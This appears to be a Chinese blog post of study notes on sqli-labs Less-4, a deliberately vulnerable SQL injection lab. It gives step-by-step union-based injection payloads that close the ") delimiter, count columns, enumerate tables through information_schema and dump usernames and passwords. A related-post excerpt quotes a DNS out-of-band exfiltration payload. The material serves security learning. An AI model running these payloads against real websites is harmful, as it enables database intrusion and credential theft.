sqli-labs学习笔记4

最新推荐文章于 2025-05-24 23:44:41 发布
最新推荐文章于 2025-05-24 23:44:41 发布
阅读量426 收藏 5
点赞数 13
分类专栏: sqli-labs 文章标签: 学习 笔记 数据库 sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81574836/article/details/146402601
版权

less-4

打开靶场
在这里插入图片描述
在这里插入图片描述
查看源代码,可以看到28行,对传入的id加了个"",然后传入sql语句中有加了(),最后在sql语句中的形式为,(‘‘id’’),传入查询,要进行sql注入,我们得将前面的(“闭合,并将后面的”)注释掉,从而实现联合语句的查询。

查询字段数

id=1")order by 3 --+
在这里插入图片描述
没有显示报错。
id=1") order by 4 --+
在这里插入图片描述
看到报错了,确定字段数为3.

查看回显位

id=-1") union select 1,2,3 --+
在这里插入图片描述
这里我们可以看到回显上写的为2,3,确定了回显位

查看数据库名与数据库版本

id=-1") union select 1,database(),version() --+
在这里插入图片描述
从返回的参数来看,可以确定数据库为:security

爆破数据库表

id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘security’ --+

在这里插入图片描述
得到对应的表名

爆破数据库users表的字段名

id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ --+
在这里插入图片描述
得到字段名。

爆破数据库users表的数据

id=-1") union select 1,2,group_concat(username,id,password) from users --+
在这里插入图片描述
最后得到完整的数据信息。

sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 759
继续学习sqli-labs,本篇是less 32-37
Sqli-labs靶场搭建(适合新手小白围观)
热门推荐
记录开发和安全学习过程中的点点滴滴
09-12 1万+
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs学习笔记
2301_81574836的博客
03-20 509
sqli-labs学习笔记1
sqli-labs通关笔记
m0_67795959的博客
10-23 1025
id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema = database() limit 3,1),".域名/123.txt")))--+要写为rand(0) 或者rand(4):rand()函数的执行速度要比 group by查询并插入key值的速度更快,只有rand(0)这个顺序可以导致在插入第三个数据,rand执行第五次时导致键值冲突。
sqli-labs学习笔记3
2301_81574836的博客
03-20 200
sqli-labs学习笔记3
sqli-labs学习笔记2
2301_81574836的博客
03-20 401
sqli-labs学习笔记2
sqli-labs通关笔记(less-1 ~ less10)
weixin_44533365的博客
01-19 986
Sqli-labs是一个学习sql注入的平台,通过闯关的形式让学习的过程没有那么枯燥。个人感觉还是蛮有意思的,因此准备写一个系列来记录自己学习的过程。
sqli-labs学习笔记(1)
weixin_49248030的博客
04-22 402
sqli-labs 记录一下自己的学习,简单的做一下笔记 第一关sqli-labs前言一、sqli-labs,第一关,如何判断为字符型注入?二、通关步骤1.找到数据库2.查找表3.进入users表获得密码4.补充总结 前言 记录一下sqli-labs第一关的通过心得,不作为参考和学习资料,只求自己来时翻的时候能够看懂 一、sqli-labs,第一关,如何判断为字符型注入? 判断页面是否存在sql注入最好的方法就是在后面加上?id='1,因为无论你是字符型注入还是数值型注入页面都会返回错误。 根据页
sqli-labs靶场学习记录
weixin_60567444的博客
05-08 1803
意思就是id作为参数输入一个值 我的理解哈,可以通过hackbar来进行输入通过传参1是有数据出现,可以进行sql注入的基本判断,判断是字符型还是数字型,输入id=1'时发现报错,可根据报错的信息来进行sql语句的闭合发现是通过双引号把我们传入的1通过引号进行包裹,那么可以通过闭合引号来绕过此限制,--+是用来注释掉后面的引号,且发现闭合成功所以这里是存在一个字符型的注入order by查询字段,发现到4存在报错所以只有三个字段。
sqli-labs 笔记
qq_52109950的博客
04-07 138
根据上面查询结果,就可以还原出该数据库具体结构,再根据结构信息查询出数据库存储的信息。Less-6 的闭合字符为 " ,而Less-5的闭合字符为 '然后判断字段数量,字段数为3列;能够查询出数据库名,表名,字段名,推到出数据库结构。利用ASCII 比对,一个字符一个字符比对。经过测试,发现没有报错信息,没有显示位信息。在 ' 的后多啦一个 ) 号。第四关比第三关多 "第十关 的闭合是 "
SQL注入之sqli-labs环境搭建(渡栗的学习笔记
2301_79998006的博客
05-31 679
sqli-labs是一个专业的sql注入练习平台,使用于GET和POST场景,包含了以下注入:1.基于错误的注入2.基于误差的注入3.盲注入(基于Boolian数据类型注入,基于时间注入)4.更新查询注入5.插入查询注入6.Header头部注入(基于Referer注入,基于UserAgent注入,基于cookie注入)7.二阶注入(二次注入)8.绕过WAF9.绕过addslashes()函数10.绕过mysql_real_escape_string()函数(特殊条件下)
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 783
继续学习sqli-labs,本篇是less17
Android内存调优学习总结(OOM与ANR)
2301_80329517的博客
05-23 773
OOM和ANR学习总结
JVM学习(五)--执行引擎
最新发布
杀神lwz的博客
05-24 510
当Java虚拟机启动时会根据预定义的规范对字节码采用逐行解释的方式执行,将每条字节码文件中的内容“翻译”为对应平台的本地机器指令执行。
vite学习笔记
zxz86的博客
05-23 690
现代浏览器项目(Chrome >=61, Firefox >=60, Safari >=11)assetsInlineLimit: 4096, // 4KB以下资源内联。框架新项目(Vue3/React18/Svelte)极速启动:冷启动时间比传统工具快 10-100 倍。闪电热更新:HMR 更新速度不受项目规模影响。智能构建:生产环境使用 Rollup 打包。库开发(利用 Rollup 的纯净打包).scss/.less 直接导入。微前端子应用(快速加载需求)模拟 CommonJS。
Unity基础学习(六)Mono中的重要内容(2)协同程序
m0_74212916的博客
05-22 801
本文简单介绍了Unity中的协同程序
香橙派3B学习笔记2:Vscode远程SSH登录香橙派_权限问题连接失败解决
NULL指向我的博客
05-24 330
Vscode下载插件,ssh远程登录香橙派。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值